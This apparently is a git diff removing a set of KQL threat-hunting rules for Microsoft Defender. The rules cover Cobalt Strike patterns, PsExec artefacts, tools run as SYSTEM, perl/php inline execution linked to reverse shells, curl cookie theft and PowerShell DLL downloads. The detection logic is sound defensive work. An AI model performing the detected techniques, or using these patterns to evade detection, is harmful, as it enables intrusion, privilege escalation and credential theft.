diff --git a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql b/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql deleted file mode 100644 index d47a865d..00000000 --- a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: CertainlyP -// Date: 2024/04/26 -// Level: high -// Description: Detects outbound network connection initiated by Microsoft Dialer. -The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. -This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" - -// Tags: attack.execution, attack.t1071.001 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql deleted file mode 100644 index 88e21026..00000000 --- a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2023/04/28 -// Level: medium -// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses -// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql b/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql deleted file mode 100644 index e7d4364e..00000000 --- a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018/12/27 -// Level: high -// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros -// Tags: attack.execution, attack.t1059, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/Execution/PCRE.NET_Package_Image_Load.kql b/Execution/PCRE.NET_Package_Image_Load.kql deleted file mode 100644 index 87180de7..00000000 --- a/Execution/PCRE.NET_Package_Image_Load.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/29 -// Level: high -// Description: Detects processes loading modules related to PCRE.NET package -// Tags: attack.execution, attack.t1059 -DeviceImageLoadEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/Execution/PCRE.NET_Package_Temp_Files.kql b/Execution/PCRE.NET_Package_Temp_Files.kql deleted file mode 100644 index 0db1282d..00000000 --- a/Execution/PCRE.NET_Package_Temp_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/29 -// Level: high -// Description: Detects processes creating temp files related to PCRE.NET package -// Tags: attack.execution, attack.t1059 -DeviceFileEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql deleted file mode 100644 index 09b3d975..00000000 --- a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: medium -// Description: Detect use of PDQ Deploy remote admin tool -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe" \ No newline at end of file diff --git a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql b/Execution/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Execution/PUA_-_AdvancedRun_Execution.kql b/Execution/PUA_-_AdvancedRun_Execution.kql deleted file mode 100644 index 4e6050fc..00000000 --- a/Execution/PUA_-_AdvancedRun_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/Execution/PUA_-_CsExec_Execution.kql b/Execution/PUA_-_CsExec_Execution.kql deleted file mode 100644 index 8057d416..00000000 --- a/Execution/PUA_-_CsExec_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/22 -// Level: high -// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative -// Tags: attack.resource_development, attack.t1587.001, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec" \ No newline at end of file diff --git a/Execution/PUA_-_NSudo_Execution.kql b/Execution/PUA_-_NSudo_Execution.kql deleted file mode 100644 index a3bb925b..00000000 --- a/Execution/PUA_-_NSudo_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of NSudo tool for command execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe"))) \ No newline at end of file diff --git a/Execution/PUA_-_NirCmd_Execution.kql b/Execution/PUA_-_NirCmd_Execution.kql deleted file mode 100644 index 68200d1c..00000000 --- a/Execution/PUA_-_NirCmd_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/24 -// Level: medium -// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide ")) \ No newline at end of file diff --git a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql b/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql deleted file mode 100644 index d9debfcd..00000000 --- a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of NirCmd tool for command execution as SYSTEM user -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where ProcessCommandLine contains " runassystem " \ No newline at end of file diff --git a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql deleted file mode 100644 index 9edcca22..00000000 --- a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines -// Tags: attack.execution, attack.lateral_movement, attack.t1072 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe" \ No newline at end of file diff --git a/Execution/PUA_-_RunXCmd_Execution.kql b/Execution/PUA_-_RunXCmd_Execution.kql deleted file mode 100644 index fc892f3c..00000000 --- a/Execution/PUA_-_RunXCmd_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/24 -// Level: high -// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceProcessEvents -| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec=" \ No newline at end of file diff --git a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql b/Execution/PUA_-_Wsudo_Suspicious_Execution.kql deleted file mode 100644 index 1282a6c6..00000000 --- a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/02 -// Level: high -// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) -// Tags: attack.execution, attack.privilege_escalation, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql b/Execution/Parent_in_Public_Folder_Suspicious_Process.kql deleted file mode 100644 index 65b83f51..00000000 --- a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder -// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\" \ No newline at end of file diff --git a/Execution/Perl_Inline_Command_Execution.kql b/Execution/Perl_Inline_Command_Execution.kql deleted file mode 100644 index c6389427..00000000 --- a/Execution/Perl_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe") \ No newline at end of file diff --git a/Execution/Php_Inline_Command_Execution.kql b/Execution/Php_Inline_Command_Execution.kql deleted file mode 100644 index d4eeee8a..00000000 --- a/Execution/Php_Inline_Command_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe") \ No newline at end of file diff --git a/Execution/Potential_Adplus.EXE_Abuse.kql b/Execution/Potential_Adplus.EXE_Abuse.kql deleted file mode 100644 index 680e85fa..00000000 --- a/Execution/Potential_Adplus.EXE_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: high -// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. -// Tags: attack.defense_evasion, attack.execution, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql deleted file mode 100644 index 4d1541c8..00000000 --- a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file diff --git a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql deleted file mode 100644 index 4d75232f..00000000 --- a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/03 -// Level: medium -// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -Attackers can abuse this utility in order to download arbitrary files via a configuration file. -Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. - -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql deleted file mode 100644 index e33493d3..00000000 --- a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith 
"\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith 
"\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or 
FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals"))))) \ No newline at end of file diff --git a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql deleted file mode 100644 index 17de2322..00000000 --- a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/26 -// Level: medium -// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file -// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/Execution/Potential_CobaltStrike_Process_Patterns.kql b/Execution/Potential_CobaltStrike_Process_Patterns.kql deleted file mode 100644 index 03bf6e5d..00000000 --- a/Execution/Potential_CobaltStrike_Process_Patterns.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/27
-// Level: high
-// Description: Detects potential process patterns related to Cobalt Strike beacon activity
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql b/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
deleted file mode 100644
index 026648ff..00000000
--- a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: xknow @xknow_infosec, Tim Shelton
-// Date: 2020/06/11
-// Level: high
-// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/Execution/Potential_Cookies_Session_Hijacking.kql b/Execution/Potential_Cookies_Session_Hijacking.kql
deleted file mode 100644
index 250526bc..00000000
--- a/Execution/Potential_Cookies_Session_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql b/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
deleted file mode 100644
index 5451ccc8..00000000
--- a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Hieu Tran
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
-// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
